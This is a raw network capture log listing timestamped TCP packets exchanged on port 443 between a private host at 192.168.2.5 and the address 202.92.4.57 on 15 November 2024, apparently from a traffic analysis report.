                                                                                                                                                                                                    Nov 15, 2024 09:00:16.547146082 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.547585964 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.547629118 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.547636986 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.547655106 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.547668934 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.547705889 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.547730923 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.548003912 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.548051119 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.548079967 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.548086882 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.548110962 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.548124075 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.548290014 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.548330069 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.548361063 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.548368931 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.548397064 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.548408031 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.548794031 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.548835039 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.548861027 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.548867941 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.548897982 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.548918009 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.549231052 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.549273014 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.549303055 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.549309969 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.549331903 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.549352884 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.567061901 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.567104101 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.567297935 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.567297935 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.567398071 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.567435980 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.567491055 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.567514896 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.567548990 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.567595005 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.567770004 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.567809105 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.567972898 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.567972898 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.568037987 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.568082094 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.568106890 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.568126917 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.568142891 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.568151951 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.568412066 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.568417072 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.568413019 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.568456888 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.568483114 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.568485975 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.568532944 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.568566084 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.568749905 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.568788052 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.568830967 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.568866014 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.568897963 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.568942070 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.601753950 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.601816893 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.601871014 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.601941109 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.601979971 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.602003098 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.606823921 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.606848955 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.606899023 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.606914043 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.606949091 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.606966972 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.662517071 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.662579060 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.662630081 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.662643909 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.662672043 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.662688971 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.662878036 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.662919044 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.662947893 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.662961006 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.662990093 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.663012981 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.663547993 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.663620949 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.663664103 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.663681984 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.663705111 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.663731098 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.663970947 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.664016962 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.664048910 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.664067030 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.664093971 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.664112091 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.664608955 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.664649963 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.664679050 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.664691925 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.664720058 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.664746046 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.665016890 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.665061951 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.665098906 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.665111065 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.665139914 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.665168047 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.665376902 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.665421963 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.665498972 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.665498972 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.665517092 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.665587902 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.665846109 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.665884018 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.665914059 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.665925980 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.665954113 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.665971994 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.666182995 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.666237116 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.666259050 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.666271925 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.666320086 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.666321039 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.666574955 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.666629076 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.666652918 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.666665077 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.666692972 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.666717052 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.666934967 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.666981936 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.667012930 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.667026043 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.667057037 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.667078018 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.683928967 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.683984995 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.684037924 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.684056044 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.684084892 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.684102058 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.684289932 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.684392929 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.684422970 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.684434891 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.684464931 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.684504032 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.684691906 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.684739113 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.684766054 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.684778929 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.684806108 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.684824944 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.685029030 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.685067892 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.685102940 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.685115099 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.685142994 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.685161114 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.685458899 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.685498953 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.685528040 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.685539961 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.685568094 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.685600996 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.685853004 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.685900927 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.685940027 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.685954094 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.685981989 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.686001062 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.723968029 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.724025965 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.724073887 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.724143028 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.724178076 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.724200964 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.779599905 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.779669046 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.779726982 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.779745102 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.779773951 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.779795885 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.779982090 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.780034065 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.780071020 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.780082941 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.780109882 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.780127048 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.780291080 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.780330896 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.780405998 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.780419111 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.780472994 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.781141043 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.781198025 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.781217098 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.781229973 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.781258106 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.781280041 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.781471968 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.781511068 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.781538010 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.781549931 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.781578064 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.781598091 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.781755924 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.781810045 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.781850100 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.781867027 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.781896114 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.781915903 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.782124043 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.782166958 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.782198906 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.782211065 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.782237053 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.782255888 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.782335043 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.782362938 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.782398939 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.782411098 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.782435894 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.782458067 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.782799006 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.782818079 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.782881975 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.782893896 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.782951117 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.782952070 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.783103943 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.783128977 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.783174038 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.783190966 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.783216000 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.783238888 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.783484936 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.783508062 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.783554077 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.783565998 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.783592939 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.783612967 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.783890009 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.783910036 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.783955097 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.783967018 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.783996105 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.784019947 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.800823927 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.800864935 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.800930023 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.800942898 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.800967932 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.800987005 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.801265001 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.801311970 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.801351070 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.801362038 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.801388979 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.801407099 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.801609993 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.801650047 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.801692963 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.801704884 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.801729918 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.801759005 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.802171946 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.802211046 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.802251101 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.802262068 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.802310944 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.802311897 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.802918911 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:16.802963018 CET44349704202.92.4.57192.168.2.5
